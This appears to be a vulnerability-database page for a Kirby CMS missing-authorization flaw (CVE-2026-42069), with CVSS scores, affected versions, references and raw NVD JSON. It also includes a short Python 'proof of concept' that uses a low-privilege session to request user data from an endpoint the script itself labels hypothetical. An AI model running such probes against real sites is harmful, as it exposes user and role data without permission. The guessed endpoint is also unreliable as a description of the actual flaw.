CVE-2026-42069

Description

Kirby is an open-source content management system. Prior to versions 4.9.0 and 5.4.0, read access to site, user and role information is not gated by permissions. This issue has been patched in versions 4.9.0 and 5.4.0.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:getkirby:kirby:*:*:*:*:*:*:*:* - VULNERABLE

Kirby CMS < 4.9.0

Kirby CMS < 5.4.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2026-42069 Proof of Concept
# Target: Kirby CMS < 4.9.0 or < 5.4.0
# Description: Exploit permission misconfiguration to read sensitive user/role data.

target_url = "http://target-site.com/api/site/users"  # Hypothetical endpoint

# Attacker uses a low-privilege session (PR:L requirement)
cookies = {
    "kirby_session": "low_priv_user_session_token"
}

headers = {
    "User-Agent": "CVE-2026-42069-Scanner/1.0",
    "Accept": "application/json"
}

try:
    response = requests.get(target_url, cookies=cookies, headers=headers)
    
    if response.status_code == 200:
        print("[+] Exploit Successful! Leaked Data:")
        print(response.json())
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)
        
except Exception as e:
    print(f"[!] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42069
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42069
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42069/
[4] VulDB https://vuldb.com/cve/CVE-2026-42069
[5] https://github.com/getkirby/kirby/releases/tag/4.9.0
[6] https://github.com/getkirby/kirby/releases/tag/5.4.0
[7] https://github.com/getkirby/kirby/security/advisories/GHSA-2h7v-4372-f6x2

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42069", "sourceIdentifier": "[email protected]", "published": "2026-05-09T04:16:22.297", "lastModified": "2026-05-18T13:00:59.960", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kirby is an open-source content management system. Prior to versions 4.9.0 and 5.4.0, read access to site, user and role information is not gated by permissions. This issue has been patched in versions 4.9.0 and 5.4.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getkirby:kirby:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.9.0", "matchCriteriaId": "1BB5394F-37F9-4A53-9CE7-79548F674886"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getkirby:kirby:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.4.0", "matchCriteriaId": "B2D943B9-CD71-45FE-A1A4-158603C3502E"}]}]}], "references": [{"url": "https://github.com/getkirby/kirby/releases/tag/4.9.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/getkirby/kirby/releases/tag/5.4.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/getkirby/kirby/security/advisories/GHSA-2h7v-4372-f6x2", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}